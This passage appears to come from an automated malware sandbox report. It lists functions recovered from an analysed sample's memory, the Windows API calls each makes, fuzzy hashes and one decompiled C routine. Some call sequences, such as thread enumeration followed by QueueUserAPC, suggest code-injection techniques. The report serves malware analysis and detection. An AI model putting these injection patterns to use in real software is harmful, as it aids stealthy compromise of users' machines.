                              • CreateFileW.KERNEL32(053C4252,80000000,00000003,053F0244,00000003,00000000,00000000,?,00000000,?,053C4252), ref: 053DD6D3
                              • GetLastError.KERNEL32(?,00000000,?,053C4252), ref: 053DD77B
                                • Part of subcall function 053DA02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,053DD07F,?,00000000,?,?,?,053C2E53,80000001), ref: 053DA063
                                • Part of subcall function 053DA02D: lstrcpy.KERNEL32(00000000,00000000), ref: 053DA087
                                • Part of subcall function 053DA02D: lstrcat.KERNEL32(00000000,00000000), ref: 053DA08F
                              • GetFileSize.KERNEL32(053C4252,00000000,?,00000001,?,00000000,?,053C4252), ref: 053DD706
                              • CreateFileMappingA.KERNEL32(053C4252,053F0244,00000002,00000000,00000000,053C4252), ref: 053DD71A
                              • lstrlen.KERNEL32(053C4252,?,00000000,?,053C4252), ref: 053DD736
                              • lstrcpy.KERNEL32(?,053C4252), ref: 053DD746
                              • GetLastError.KERNEL32(?,00000000,?,053C4252), ref: 053DD74E
                              • HeapFree.KERNEL32(00000000,053C4252,?,00000000,?,053C4252), ref: 053DD761
                              • CloseHandle.KERNEL32(053C4252,?,00000001,?,00000000,?,053C4252), ref: 053DD773
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                              • String ID:
                              • API String ID: 194907169-0
                              • Opcode ID: c3acb545a1a156309a056080b9ac1b2db26f350f7917017084d64f10fbb5d618
                              • Instruction ID: e0310367e5af29b1f8f0bd3f81af11c45f9bfa7863c5f8138bfe82dc2c0d1438
                              • Opcode Fuzzy Hash: c3acb545a1a156309a056080b9ac1b2db26f350f7917017084d64f10fbb5d618
                              • Instruction Fuzzy Hash: C9210CB5900208FFDB219FA4D889A9DBFB9FB04354F108469F506EA190D7719E44CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CAF6F, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 053CAF95
                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 053CAFA1
                              • GetModuleHandleA.KERNEL32(?,064F96FC,00000000,?,00000000), ref: 053CAFC1
                              • GetProcAddress.KERNEL32(00000000), ref: 053CAFC8
                              • Thread32First.KERNEL32(?,0000001C), ref: 053CAFD8
                              • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 053CAFF3
                              • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 053CB004
                              • CloseHandle.KERNEL32(00000000), ref: 053CB00B
                              • Thread32Next.KERNEL32(?,0000001C), ref: 053CB014
                              • CloseHandle.KERNEL32(?), ref: 053CB020
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                              • String ID:
                              • API String ID: 2341152533-0
                              • Opcode ID: 8e31c907f6862948a9c4be50e62dfe0fd66a548f094020d65850b061dd2d8928
                              • Instruction ID: b45079694887a28a20cd265742089de8a533675f14a105547af18859fb8f8341
                              • Opcode Fuzzy Hash: 8e31c907f6862948a9c4be50e62dfe0fd66a548f094020d65850b061dd2d8928
                              • Instruction Fuzzy Hash: 7F214A72900118EFDF119FE4EC89CAEBFBDFB08350F00412AFA11AA190DB759D458BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DE5FC, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(?,?,053CEA6E), ref: 053DE611
                                • Part of subcall function 053C34EE: InterlockedExchange.KERNEL32(?,000000FF), ref: 053C34F5
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,053CEA6E), ref: 053DE631
                              • CloseHandle.KERNEL32(00000000,?,053CEA6E), ref: 053DE63A
                              • CloseHandle.KERNEL32(?,?,?,053CEA6E), ref: 053DE644
                              • RtlEnterCriticalSection.NTDLL(?), ref: 053DE64C
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 053DE664
                              • Sleep.KERNEL32(000001F4), ref: 053DE673
                              • CloseHandle.KERNEL32(?), ref: 053DE680
                              • LocalFree.KERNEL32(?), ref: 053DE68B
                              • RtlDeleteCriticalSection.NTDLL(?), ref: 053DE695
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                              • String ID:
                              • API String ID: 1408595562-0
                              • Opcode ID: 2f0f359b7d19f8ff44d9ba3e2d425feb0f132e90167bbdeaffa1427d4ae44956
                              • Instruction ID: ed85efe7f9fb8e8eada15bb05e8b93af84aa259f98dfd7045b4280e47f2dae89
                              • Opcode Fuzzy Hash: 2f0f359b7d19f8ff44d9ba3e2d425feb0f132e90167bbdeaffa1427d4ae44956
                              • Instruction Fuzzy Hash: D8114872610615ABCB31AB65EC4D95AFFFEBF04711B550918F2829F890CB7AE8009B74
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CFD22, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,00000000,053DD9EF,00000011,?,00000001,00000000,?,-00000008), ref: 053CFD52
                              • RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 053CFD68
                              • memcpy.NTDLL(00000010,?,00000000), ref: 053CFD9E
                              • memcpy.NTDLL(00000010,00000000,?), ref: 053CFDB9
                              • CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 053CFDD7
                              • GetLastError.KERNEL32 ref: 053CFDE1
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053CFE04
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                              • String ID: (
                              • API String ID: 2237239663-3887548279
                              • Opcode ID: 45b78c6ae533eb449316d9d797177249e772ebce80a7b84cc6908b4fe7887d1a
                              • Instruction ID: 30781f477b75fca76275d24d487b5ccd179dab8219a415e5f20c26d9dd8d8b75
                              • Opcode Fuzzy Hash: 45b78c6ae533eb449316d9d797177249e772ebce80a7b84cc6908b4fe7887d1a
                              • Instruction Fuzzy Hash: 5031AC76900309EFCB21CFA9DC49AABBFBAFB44314F104429FD46D6251E6709E14DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E16BD, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E3C8A: RtlEnterCriticalSection.NTDLL(053F0488), ref: 053E3C92
                                • Part of subcall function 053E3C8A: RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053E3CA7
                                • Part of subcall function 053E3C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 053E3CC0
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 053E16FA
                              • memset.NTDLL ref: 053E170B
                              • lstrcmpi.KERNEL32(?,?), ref: 053E174B
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E1777
                              • memcpy.NTDLL(00000000,?,?), ref: 053E178B
                              • memset.NTDLL ref: 053E1798
                              • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 053E17B1
                              • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 053E17D4
                              • HeapFree.KERNEL32(00000000,?), ref: 053E17F1
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 694413484-0
                              • Opcode ID: 658995e7b8e81c88e4d6112cbfe84bf2c9019693c0ba81458755b451ecf75e5f
                              • Instruction ID: 27328fa970bf57a4560c2413df7d2d0f5cdb1d10e8956277cb9351f69b9404e0
                              • Opcode Fuzzy Hash: 658995e7b8e81c88e4d6112cbfe84bf2c9019693c0ba81458755b451ecf75e5f
                              • Instruction Fuzzy Hash: C0419E72A00219EFDB21CF94DC89A9EBBF9FF04354F144469F805E7291DB71AA05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C6D99, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,C0000000,053C23FB,00000000,053C23FC,00000080,00000000,00000000,053E8BAA,747869A0,053C23FB,?), ref: 053C6DDA
                              • GetLastError.KERNEL32 ref: 053C6DE4
                              • WaitForSingleObject.KERNEL32(000000C8), ref: 053C6E09
                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 053C6E2A
                              • SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 053C6E52
                              • WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 053C6E67
                              • SetEndOfFile.KERNEL32(00000001), ref: 053C6E74
                              • GetLastError.KERNEL32 ref: 053C6E80
                              • CloseHandle.KERNEL32(00000001), ref: 053C6E8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                              • String ID:
                              • API String ID: 2864405449-0
                              • Opcode ID: dd0f95ca346fff4bcf561cf23e6a2a0a889d8a33446ffaa7080d17c760c6ffd9
                              • Instruction ID: 2c563332c8af89e352bf7aae561c66811ff6a1b8c7ce860054407c9eb910566b
                              • Opcode Fuzzy Hash: dd0f95ca346fff4bcf561cf23e6a2a0a889d8a33446ffaa7080d17c760c6ffd9
                              • Instruction Fuzzy Hash: 90316D71910209AFEF218FA8DE4ABAE7FB9FB45315F1041A9F911EA0D0C7758E509B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C97EA, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,00000001,00000000,053D0E83,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000001), ref: 053C9809
                              • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 053C983D
                              • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 053C9845
                              • GetLastError.KERNEL32 ref: 053C984F
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 053C986B
                              • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 053C9884
                              • CancelIo.KERNEL32(?), ref: 053C9899
                              • CloseHandle.KERNEL32(?), ref: 053C98A9
                              • GetLastError.KERNEL32 ref: 053C98B1
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                              • String ID:
                              • API String ID: 4263211335-0
                              • Opcode ID: 93a0eb8a52d3a109f2aa51aca2033cf0fcddc46e532e411c4f3c4e7e10576b52
                              • Instruction ID: 7d6ca15f3a8a7a4f76bd0b60efd0b7c11d72fe8ece18dc881f1ef005ee67d55e
                              • Opcode Fuzzy Hash: 93a0eb8a52d3a109f2aa51aca2033cf0fcddc46e532e411c4f3c4e7e10576b52
                              • Instruction Fuzzy Hash: B2215172910218AFCB129FA4DC499EE7FBEFB44310F014469F916DB180DB719A408BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E7D2D, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,053DA363), ref: 053E7D43
                              • wsprintfA.USER32 ref: 053E7D6B
                              • lstrlen.KERNEL32(?), ref: 053E7D7A
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              • wsprintfA.USER32 ref: 053E7DBA
                              • wsprintfA.USER32 ref: 053E7DEF
                              • memcpy.NTDLL(00000000,?,?), ref: 053E7DFC
                              • memcpy.NTDLL(00000008,053EA3F8,00000002,00000000,?,?), ref: 053E7E11
                              • wsprintfA.USER32 ref: 053E7E34
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                              • String ID:
                              • API String ID: 2937943280-0
                              • Opcode ID: 55252ab96d1142e6cff0e4ad62daf46efefcafafed75531385f90e7b5cb08b74
                              • Instruction ID: 807da9e8882f098354b422ca3159eeeb4adde85c48c6f09e8e9f2ec99089588d
                              • Opcode Fuzzy Hash: 55252ab96d1142e6cff0e4ad62daf46efefcafafed75531385f90e7b5cb08b74
                              • Instruction Fuzzy Hash: 51412C76A00109EFCB14DFA8D889EAEB7FCFF44308B144555F919D7251EA70EA15CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C570C, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 053C5730
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053C5742
                              • wcstombs.NTDLL ref: 053C5750
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 053C5774
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 053C5789
                              • mbstowcs.NTDLL ref: 053C5796
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053C57A8
                              • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 053C57C2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 316328430-0
                              • Opcode ID: 5b317e2826514d443aef814c9fa8e007d8d5960af9ef96a0ef2fc17e0e6126b6
                              • Instruction ID: 3f9e4a8bf1c37563c56ae984cb014a826efe4fd1988191df7e4571c242c3ebeb
                              • Opcode Fuzzy Hash: 5b317e2826514d443aef814c9fa8e007d8d5960af9ef96a0ef2fc17e0e6126b6
                              • Instruction Fuzzy Hash: 6521597151020AFFCF219FA4DC49F9A7FBEFB44315F104165B601EA1A0DB719951DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3D4D, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DA6
                              • lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DC4
                              • RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 053D3DED
                              • memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E04
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D3E17
                              • memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E26
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?), ref: 053D3E8A
                                • Part of subcall function 053C8F84: RtlLeaveCriticalSection.NTDLL(?), ref: 053C9001
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                              • String ID:
                              • API String ID: 1635816815-0
                              • Opcode ID: bb78ac982545c3cfb7433f7b9f3d2b23681ce8697c6b70dfb09fcfd4947a449f
                              • Instruction ID: 3871266148c32442be97d91c2eac5a9f9424f9e69a6e778a1b39318a9a7fcc15
                              • Opcode Fuzzy Hash: bb78ac982545c3cfb7433f7b9f3d2b23681ce8697c6b70dfb09fcfd4947a449f
                              • Instruction Fuzzy Hash: AA417173A00218AFCB229F64EC48BAEBFBAFF04354F154865F9059B190D7B19D50DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E4420, Relevance: 10.6, APIs: 7, Instructions: 109memoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 053E446A
                              • StrTrimA.SHLWAPI(?,?), ref: 053E448D
                              • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 053E44F6
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 053E4519
                              • DeleteFileA.KERNEL32(?,00003219), ref: 053E4542
                              • HeapFree.KERNEL32(00000000,?), ref: 053E4554
                              • HeapFree.KERNEL32(00000000,?,00003219), ref: 053E4565
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1078934163-0
                              • Opcode ID: 391f65a4682d134060cf45069ac9d8914b4a8e54616757c2ac56d5106c808ae6
                              • Instruction ID: 096c36a119a71b9aaf0bf981d59a74f30dcfe9069f1c72b312949ddedde0bea5
                              • Opcode Fuzzy Hash: 391f65a4682d134060cf45069ac9d8914b4a8e54616757c2ac56d5106c808ae6
                              • Instruction Fuzzy Hash: D6419972204316AFDB11DF18DC49F6A7BECBB48704F040919F644DA1D1EBB0EA09CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DF482, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 053DF498
                              • lstrcmpiW.KERNEL32(00000000,?), ref: 053DF4D0
                              • lstrcmpiW.KERNEL32(?,?), ref: 053DF4E5
                              • lstrlenW.KERNEL32(?), ref: 053DF4EC
                              • CloseHandle.KERNEL32(?), ref: 053DF514
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 053DF540
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 053DF55E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                              • String ID:
                              • API String ID: 1496873005-0
                              • Opcode ID: cd3fcc15310949ce1b889b5db21f4409770cd2cd4302e1f05884bfb187315c21
                              • Instruction ID: 89402a892c7ea7b82a812ccb311cd85cc3043c3e44da6871a75a4fd3852dba0d
                              • Opcode Fuzzy Hash: cd3fcc15310949ce1b889b5db21f4409770cd2cd4302e1f05884bfb187315c21
                              • Instruction Fuzzy Hash: AF213072610205ABDB219F65ECC9E6BBBFDBF04784F040558F903EA145EB70EA459B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E4DBB, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,00000000,000000B7,?,00000001,053C548D,00000000,00000000,00000011), ref: 053E4DFC
                              • HeapFree.KERNEL32(00000000,00000000,00001ED2,00000000,000000B7,?,00000001,053C548D,00000000,00000000,00000011), ref: 053E4E6F
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 2078930461-0
                              • Opcode ID: cc4dd51edbb5a75acb8ade7914f3e8d3178aa8192dc8f1bc232846b256742e98
                              • Instruction ID: 77176624f3c4b9a9c4d43efdd18cd7553322d1d35548dbbc312363be022c6544
                              • Opcode Fuzzy Hash: cc4dd51edbb5a75acb8ade7914f3e8d3178aa8192dc8f1bc232846b256742e98
                              • Instruction Fuzzy Hash: 8911E371250329BBDB326A60AC4EF6B7F9EEB897A5F000111F6019E5D1EE624C58C7E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049DA7FB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E049DA7FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x49dd2b8; // 0xe3a5a8
				_t1 = _t9 + 0x49de62c; // 0x253d7325
				_t36 = 0;
				_t28 = E049D2262(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x58195b1
					_t41 = E049D55DC(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E049D66FF(_t34, _t41, _a8);
						E049D6DFA(_t41);
						_t42 = E049D4024(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E049D6DFA(_t36);
							_t36 = _t42;
						}
						_t43 = E049D484D(_t36, _t33);
						if(_t43 != 0) {
							E049D6DFA(_t36);
							_t36 = _t43;
						}
					}
					E049D6DFA(_t28);
				}
				return _t36;
			}














                              0x049da7fb
                              0x049da7fe
                              0x049da7ff
                              0x049da807
                              0x049da80e
                              0x049da815
                              0x049da819
                              0x049da81f
                              0x049da826
                              0x049da82b
                              0x049da833
                              0x049da83d
                              0x049da841
                              0x049da845
                              0x049da84b
                              0x049da850
                              0x049da860
                              0x049da862
                              0x049da879
                              0x049da87d
                              0x049da880
                              0x049da885
                              0x049da885
                              0x049da88e
                              0x049da892
                              0x049da895
                              0x049da89a
                              0x049da89a
                              0x049da892
                              0x049da89d
                              0x049da89d
                              0x049da8a8

                              APIs
                                • Part of subcall function 049D2262: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,049DA815,253D7325,00000000,00000000,?,?,74785520,049D64DC), ref: 049D22C9
                                • Part of subcall function 049D2262: sprintf.NTDLL ref: 049D22EA
                              • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,049D64DC,?,058195B0), ref: 049DA826
                              • lstrlen.KERNEL32(?,?,74785520,049D64DC,?,058195B0), ref: 049DA82E
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • strcpy.NTDLL ref: 049DA845
                              • lstrcat.KERNEL32(00000000,?), ref: 049DA850
                                • Part of subcall function 049D66FF: lstrlen.KERNEL32(?,?,049D64DC,049D64DC,00000001,00000000,00000000,?,049DA85F,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049D6716
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049DA86D
                                • Part of subcall function 049D4024: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,049DA879,00000000,?,74785520,049D64DC,?,058195B0), ref: 049D402E
                                • Part of subcall function 049D4024: _snprintf.NTDLL ref: 049D408C
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 3d7e9a349dc4e4316045ff16d8176592ed082826fafc4af09645a94074a6cab2
                              • Instruction ID: c738f7d1efbe09db57c3de83103fc95db360be2a80befb1ae8274c6780aaf445
                              • Opcode Fuzzy Hash: 3d7e9a349dc4e4316045ff16d8176592ed082826fafc4af09645a94074a6cab2
                              • Instruction Fuzzy Hash: E211A973901165BB97127BB9AC44C6F3AADDEC5668309C135FA05A7100DF38FD0297E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C5D8B, Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                              Download Yara Rule
                              APIs
                              • SwitchToThread.KERNEL32(?,?,053E2516), ref: 053C5DB6
                              • CloseHandle.KERNEL32(?,?,053E2516), ref: 053C5DC2
                              • CloseHandle.KERNEL32(00000000,747DF720,?,053E2320,00000000,?,?,?,053E2516), ref: 053C5DD4
                              • memset.NTDLL ref: 053C5DEB
                              • memset.NTDLL ref: 053C5E02
                              • memset.NTDLL ref: 053C5E19
                              • memset.NTDLL ref: 053C5E30
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memset$CloseHandle$SwitchThread
                              • String ID:
                              • API String ID: 3699883640-0
                              • Opcode ID: 9d0a5702f6bbff39a0167c9c03be12879c0332b9ed825e0a723c3750872f78ca
                              • Instruction ID: 7b40ac22914da68c393a391b8d38ae4bd9409c13b52dc397bb6e193804dcd48a
                              • Opcode Fuzzy Hash: 9d0a5702f6bbff39a0167c9c03be12879c0332b9ed825e0a723c3750872f78ca
                              • Instruction Fuzzy Hash: D9110171A12160B7C626BB6DAC0EC4F3FACABD2B04F14006AF106BB193CB65680087B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E1FD9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
